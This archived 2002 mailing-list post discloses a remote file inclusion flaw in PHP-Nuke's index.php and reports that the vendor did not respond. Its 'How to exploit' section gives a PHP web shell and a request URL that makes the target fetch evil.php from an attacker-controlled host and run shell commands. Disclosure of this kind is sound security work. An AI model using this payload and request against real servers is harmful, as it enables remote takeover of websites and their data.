PHP-Nuke allows Command Execution & Much more

From: Handle Nopman (nopmanat_private)
Date: Wed Jan 16 2002 - 10:30:53 PST

Next message: Alan Caulkins: "Re: Serious privacy leak in Python for Windows"

Previous message: Kevin L. Poulsen: "Breakable"
Next in thread: truff: "Re: PHP-Nuke allows Command Execution & Much more"
Reply: truff: "Re: PHP-Nuke allows Command Execution & Much more"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi All!

I've found a serious security flaw in PHP-Nuke.
It allows user to execute any PHP code.

The flaw is in the index.php's include file feature.
It allows including files like index.php?file=file
It prevents users including ..'s in URL's, but
it didn't prevent users from entering http://-urls
Remember the PHP's remote get feature...

How to exploit:
Upload this file to some free web space provider or
setup your own server:
<?php
system($cmd);
?>
Then just requesting http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
will execute ls -al command.
I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies)

Vendor status:
I contacted the author on 28.12.2001 and he hasn't
replied.

Sincrely
"Nopman"


-- 

Powered by Outblaze

Next message: Alan Caulkins: "Re: Serious privacy leak in Python for Windows"
Previous message: Kevin L. Poulsen: "Breakable"
Next in thread: truff: "Re: PHP-Nuke allows Command Execution & Much more"
Reply: truff: "Re: PHP-Nuke allows Command Execution & Much more"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jan 16 2002 - 16:32:45 PST